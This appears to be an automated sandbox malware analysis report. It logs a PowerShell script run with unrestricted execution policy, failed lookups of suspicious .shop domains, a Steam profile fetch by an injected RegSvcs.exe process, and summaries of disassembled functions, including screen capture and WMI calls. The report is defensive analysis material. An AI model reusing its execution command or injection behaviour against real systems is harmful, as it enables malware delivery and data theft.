Jan 11, 2025 10:03:02.330696106 CET	1.1.1.1	192.168.2.5	0x6f9a	Name error (3)	versersleep.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.401830912 CET	1.1.1.1	192.168.2.5	0x3157	Name error (3)	chipdonkeruz.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.413100004 CET	1.1.1.1	192.168.2.5	0xd4d6	Name error (3)	handscreamny.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.424712896 CET	1.1.1.1	192.168.2.5	0xc644	Name error (3)	robinsharez.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.432813883 CET	1.1.1.1	192.168.2.5	0xec33	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.102.49.254	443	1976	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 09:03:03 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-11 09:03:03 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 11 Jan 2025 09:03:03 GMT Content-Length: 25665 Connection: close Set-Cookie: sessionid=2024d900d679cdf7322efb94; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-11 09:03:03 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-11 09:03:03 UTC	11186	IN	Data Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>

Target ID:	0
Start time:	04:02:58
Start date:	11/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:02:58
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:03:01
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x640000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FF848DB0FB6 Relevance: 1.0, Instructions: 1049COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122446343.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e3736fb28559ebfe39859844989467386124adedbf892ef7d85adcd4654e3c
Instruction ID: 942e1387abd51ebc4f18dcf266bfa6b16f0abfb881ec74ad394cf24f72e7537f
Opcode Fuzzy Hash: a4e3736fb28559ebfe39859844989467386124adedbf892ef7d85adcd4654e3c
Instruction Fuzzy Hash: 01625931E0EA894FEB96A72C58552B57BE1EF6A3A0F0801FBD04DC7197DE189C0AC355

Function 00007FF848CED870 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

Yr, xrefs: 00007FF848CEDA0B

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID: Yr
API String ID: 0-48185740
Opcode ID: 787b134fcfd83a97c53ca5c328e42e5fdf895a95ebbc331dcf265625e79ecf9d
Instruction ID: 84d00cfc6944a69a31b94ecacbcc4ffb257fd619a0b8a952ea9a69eb8f9adae0
Opcode Fuzzy Hash: 787b134fcfd83a97c53ca5c328e42e5fdf895a95ebbc331dcf265625e79ecf9d
Instruction Fuzzy Hash: 5D21D522E4DA560FE3B2F66C68911B53793EF42394F194276C649CB1C3EE0CAD0582DE

Function 00007FF848DB1304 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122446343.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b939840fe09c69012504c811c1f72feec9d413ab7bf583d0239b8219315c230
Instruction ID: efbfbff713d2e6d2ac004fef3a9648d3ad9523e206c81fe7da89279b309179ce
Opcode Fuzzy Hash: 6b939840fe09c69012504c811c1f72feec9d413ab7bf583d0239b8219315c230
Instruction Fuzzy Hash: BD613821E0EACA4FEB96A73854582747FE1FF6A364F5801FAD04CCB1D7DA199C098345

Function 00007FF848DB1D0C Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122446343.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ad65df7d5ccc55e81cbd9da1ca008ad5dee7d7ab4254f8223c19751fb38d936
Instruction ID: 7f9b7139f3d0f91af0a4a1023f2a1955ef105ad17df7c669d658f50dca785780
Opcode Fuzzy Hash: 9ad65df7d5ccc55e81cbd9da1ca008ad5dee7d7ab4254f8223c19751fb38d936
Instruction Fuzzy Hash: 56113A32B0DB854FEB59AB2CA4052B9B7D1FF99165F04017FD14EC3593DF15980A4349

Function 00007FF848CED6F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ac68a66d017dfa193d771234c3b36b82b479aa7f994cca321fad94e5cf667c3
Instruction ID: f815c130d93f2b3872b0ccbc90c4d72d3f3834ce4c8b22dd556b1656f6b997b6
Opcode Fuzzy Hash: 2ac68a66d017dfa193d771234c3b36b82b479aa7f994cca321fad94e5cf667c3
Instruction Fuzzy Hash: 9201523092C9094FD3D4FB2C84593B9B2E1FF98391F50057ED84DC36A5DF6968808785

Function 00007FF848CE37B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 55542712fca55ba54de952b9380edddcb8beb0294b5c14c79122f40227c60d2c
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 1301447111CB094FD744EF0CE451AA6B7E0FB99364F10056DE58AC3651D726E882CB45

Function 00007FF848CED97C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a951658f9efa096ab1acecd4344999e3323dce78aae5cae4239ee3736e3ee5
Instruction ID: 6157be8536a23ed50aac47167373a264322c4c7a4147acd56bd611d5c802349b
Opcode Fuzzy Hash: 06a951658f9efa096ab1acecd4344999e3323dce78aae5cae4239ee3736e3ee5
Instruction Fuzzy Hash: 44018161E1DD4A0FE3D8F66C04192BA5583DF94781F1402BED50ECB2D7DE1CAC410389

Function 00007FF848CE85CE Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
Instruction ID: ce8ef2e6b7ce0586649dbe24d155e3e7a609b3a33f6e5e6e50b01cdf77e52404
Opcode Fuzzy Hash: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
Instruction Fuzzy Hash: BEF0BE3574C6064BEB1CEA3884670397296E785300BA0523DE897CA2E2ED28E9238285

Function 00007FF848CE55AB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0cdb395ec2ef4b9bd0025ff7ae059d09b3f71afb0a8c97e9053b78e193dab14
Instruction ID: 811c2e01c51b0995ad371f6424a4e11c8833d1dc50ea7f3935589d7eaf6f62bb
Opcode Fuzzy Hash: f0cdb395ec2ef4b9bd0025ff7ae059d09b3f71afb0a8c97e9053b78e193dab14
Instruction Fuzzy Hash: 8DF0D030A2D7415FD748EB28818247EB7D1FFC9745F50693DF5C693241CB38A8028A8B

Function 00007FF848CE48D7 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 634821d215ebc2fc4eaa4b12bfa7367ba74d3569bc5ed6b867656292cd642d97
Instruction ID: 92dbf38c5e3ea5db7a72a153415592b647a1ce7d580bde9e859015dacfb36147
Opcode Fuzzy Hash: 634821d215ebc2fc4eaa4b12bfa7367ba74d3569bc5ed6b867656292cd642d97
Instruction Fuzzy Hash: C7F06D70E0950BCFDB44EFA8C4819BEB7F6BB84350F108526D004E2285CB38AA40CB94

Non-executed Functions

Function 00007FF848CE5190 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112cf53b4cd1b6d1ca8f868376c9d3bb0c2541231a40adc71e37145db419707e
Instruction ID: 622fd0de6df4744911c395f93e4941a17a7038da71e1197c7fbaf1eaff509ebe
Opcode Fuzzy Hash: 112cf53b4cd1b6d1ca8f868376c9d3bb0c2541231a40adc71e37145db419707e
Instruction Fuzzy Hash: F8216722A1CA890FE36CEE785C8A472BB99D787264706837EC58BC75A7DD18680742C1

Function 00007FF848CEA610 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122018884.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848ce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42870e1e814535ecce5c9c5adbec806ef51804ec48e7c319b590edd5b2df7037
Instruction ID: 33b6bf97483191212d724b310a93475f15522784d0b6662805cc97fa4b17ed34
Opcode Fuzzy Hash: 42870e1e814535ecce5c9c5adbec806ef51804ec48e7c319b590edd5b2df7037
Instruction Fuzzy Hash: D711296264D39C0FE32CACB45C8B472BB5DC383125306827FDAC3C65A3EE45A41342C1

Analysis Process: RegSvcs.exePID: 1976, Parent PID: 6968COMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.8%
Total number of Nodes:	65
Total number of Limit Nodes:	5

Executed Functions

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004088A4
GetCurrentThreadId.KERNEL32 ref: 004088AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
GetForegroundWindow.USER32 ref: 0040896A
ExitProcess.KERNEL32 ref: 00408AB7

Strings

6W01, xrefs: 004089B5

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K{Du, xrefs: 0040B3DA
fWpQ, xrefs: 0040B397
?_oY, xrefs: 0040B389
@w@q, xrefs: 0040B3E4
Bc*}, xrefs: 0040B3C6
`/(), xrefs: 0040B588
6C(], xrefs: 0040B382

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
API String ID: 0-74227037
Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MO, xrefs: 0040AA37
MO, xrefs: 0040A9CF

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

Function 004402C0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0044316E,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00439823 Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00439849

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 073064e62519ff9a579f370c810cb79e9028ddc2df4d2d5154c8b9d615f7e12e
Instruction ID: e0540df6cb5c427e005fede11a03f79f5d5b6ceaa27f9f8c3f4a3f8ec0325a9a
Opcode Fuzzy Hash: 073064e62519ff9a579f370c810cb79e9028ddc2df4d2d5154c8b9d615f7e12e
Instruction Fuzzy Hash: CD210B72F056908BD72DCA3D8C913D97A936FDA320F2983EDC169877E4DA784D428701

Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B9C7,00000000,00000001), ref: 00440292

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
Instruction ID: c7e132dbbf166c87dd4ca7ba8e526d96017081e21b1d4d371130b4eff19db060
Opcode Fuzzy Hash: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
Instruction Fuzzy Hash: C3E02B32404310ABD2026F397C06B177674EFC6715F05087AF50156151DB38F811C5DE

Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

Function 004404B1 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004404BF

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

Function 0043EB20 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698

Non-executed Functions

Function 0043B870 Relevance: 35.9, APIs: 10, Strings: 10, Instructions: 880memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
VariantInit.OLEAUT32(?), ref: 0043BF3E

Strings

#~|, xrefs: 0043B8A7
F*R(, xrefs: 0043BE2A
:;$%, xrefs: 0043C2EC
e?^, xrefs: 0043BC4F
k"@ , xrefs: 0043BE3A
n:T8, xrefs: 0043BE4A
#~|, xrefs: 0043B89D
[&h$, xrefs: 0043BE32
96, xrefs: 0043BE52
M, xrefs: 0043BB5B

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 65563702-2807872674
Opcode ID: e6ecce7c8956681f92dc535f91b381c25ec5d52401f642ed89fa62794539d767
Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
Opcode Fuzzy Hash: e6ecce7c8956681f92dc535f91b381c25ec5d52401f642ed89fa62794539d767
Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96

Function 00436980 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 230windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00436989
GetSystemMetrics.USER32(0000004C), ref: 00436999
GetSystemMetrics.USER32(0000004D), ref: 004369A1
GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
DeleteObject.GDI32(00000000), ref: 004369C1
CreateCompatibleDC.GDI32(00000000), ref: 004369D0
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
SelectObject.GDI32(00000000,00000000), ref: 004369E7
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

Strings

Y, xrefs: 00436BEE

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
String ID: Y
API String ID: 1298755333-3233089245
Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
